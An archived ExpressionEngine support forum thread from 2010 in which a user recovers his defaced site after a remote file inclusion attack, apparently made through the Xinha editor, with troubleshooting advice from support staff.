We use cookies to help make our site work properly and to analyze how our site is used. Some are optional, but none contain your personal information, and we don't use any for ads. You can view our cookies policy, manage your cookie preferences, or consent and dismiss this banner by clicking agree:

Agree
ExpressionEngine CMS
Open, Free, Amazing

Thread

This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.

The active forums are here.

Site hacked, error messages

April 15, 2010 1:43pm

Subscribe [6]

  • #1 / Apr 15, 2010 1:43pm

    Gary Chapman

    107 posts

    I’ve been getting lots and lots of spammer/hacker registrations, which have been going into the “pending” member group that has no site privileges. Presumably these are automated registrations.

    Trying to delete these, I get the following error page:

    Warning: require(/home/gary21cp/public_html/admin/modules/forum/mod.forum.php) [function.require]: failed to open stream: Permission denied in /home/gary21cp/public_html/admin/cp/cp.members.php on line 1127

    Fatal error: require() [function.require]: Failed opening required ‘/home/gary21cp/public_html/admin/modules/forum/mod.forum.php’ (include_path=’.:/usr/lib/php:/usr/local/lib/php’) in /home/gary21cp/public_html/admin/cp/cp.members.php on line 1127

    I went to the Discussion Forum module. Clicking on “Discussion Forum” in the module control panel, I get this error page:

    Warning: require(/home/gary21cp/public_html/admin/modules/forum/mcp.forum.php) [function.require]: failed to open stream: Permission denied in /home/gary21cp/public_html/admin/cp/cp.modules.php on line 300

    Fatal error: require() [function.require]: Failed opening required ‘/home/gary21cp/public_html/admin/modules/forum/mcp.forum.php’ (include_path=’.:/usr/lib/php:/usr/local/lib/php’) in /home/gary21cp/public_html/admin/cp/cp.modules.php on line 300

    The site at http://21stcenturyproject.org has been totally defaced by hackers, but I can get access to the CP, and I’ve backed everything up. The hosting service is looking into the security breach that led to the pages defacement.

    But I need to figure out what’s going on in the error messages above so I can delete all these spammer registrations.

    I have reinstalled the Discussion Forum from the original files (2.1.2), and I replaced cp.modules.php and cp.members.php from the original EE files.

    I’m using 1.6.8, Build 20100121.

    BTW, the hackers who trashed the site are from the “Kosovo Hacking School,” reportedly.

    Thanks.

  • #2 / Apr 15, 2010 3:17pm

    Sue Crocker

    26054 posts

    Thanks for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. To that, we need some additional information from you…

      1. EE version and build (found at the bottom of your control panel)
      2. Other scripts on your account, whether in use or not (phpBB, etc…)*

      * If this is a shared hosting environment, the host can make a determination if the attack came through scripts on another account on the server, which is commonly the case with these types of hacks.

      While we work through this, please check through these files:

      * path.php
      * config.php
      * index.php

      to ensure that there is no unusual code such as iFrames or Javascript includes; if you do find that code, then please back-up the file and remove said code.  If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

      You may also wish to refresh your files by following the build update instructions.

      Also please ensure that you report this to your host immediately as they can help identify where the attack originated from so that steps can be taken to prevent this in the future.

  • #3 / Apr 15, 2010 3:51pm

    Gary Chapman

    107 posts

    Hi, Sue thanks for the reply.

    EE version and build number are in the original post.

    No other scripts running on this account. This is a virtual private server.

    The hosting company has been notified and they have a security team looking into it.

    —Gary

  • #4 / Apr 15, 2010 4:59pm

    Ingmar

    29245 posts

    Please let us know when you hear back from the host. They should be able to tell us a little more about the incident.

  • #5 / Apr 15, 2010 5:13pm

    Gary Chapman

    107 posts

    I forgot about Xinha, which appears to have been the vulnerability. I put the Xinha WYSIWYG editor in my wiki, as a Javascript call. The hosting company says that a remote file inclusion attack was successful through the Xinha directory.

    I’ll have to reinstall EE, it appears, but I may move to a different host anyway.

    I guess I won’t use Xinha. . . .

    —Gary

  • #6 / Apr 15, 2010 5:15pm

    Ingmar

    29245 posts

    Thanks for the info. Depending on the state of your database (or in case you have a recent backup) all you might have to do is replace your EE files, to be on the safe side. No need to actually re-install EE as such.

  • #7 / Apr 15, 2010 6:58pm

    Gary Chapman

    107 posts

    The site is back up, fixed.

    People should not use Xinha.

    —Gary

  • #8 / Apr 15, 2010 10:20pm

    Brandon Jones

    5500 posts

    Thank you for the information, Gary. Glad you found the cause and were able to get back up and running.

.(JavaScript must be enabled to view this email address)

ExpressionEngine News!

#eecms, #events, #releases

© Packet Tide, All Rights Reserved. Legal Notices

Username

Password

Forgot password?
or Register